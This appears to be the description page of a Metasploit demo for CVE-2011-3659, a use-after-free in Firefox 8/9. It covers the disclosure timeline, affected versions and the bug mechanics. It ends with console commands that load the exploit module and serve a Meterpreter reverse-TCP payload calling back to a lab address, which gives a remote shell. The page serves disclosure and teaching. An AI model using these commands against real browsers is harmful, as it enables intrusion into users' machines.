CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI the 2011-12-06
Coordinated public release of the vulnerability the 2011-12-20
Metasploit PoC provided the 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3659
OSVDB-78736
MFSA-2012-04

Affected version(s) :

Mozilla Firefox before version 10.0
Mozilla Firefox before version 3.6.26
Mozilla Thunderbird before version 10.0
Mozilla Thunderbird before version 3.1.18
Mozilla SeaMonkey before version 2.7

Tested on Windows XP Pro SP3 with :

Mozilla Firefox version 9.0.1

Description :

This metasploit module is quiet unstable and exploitation is random.

This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.

Commands :

use exploit/windows/browser/mozilla_attribchildremoved
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo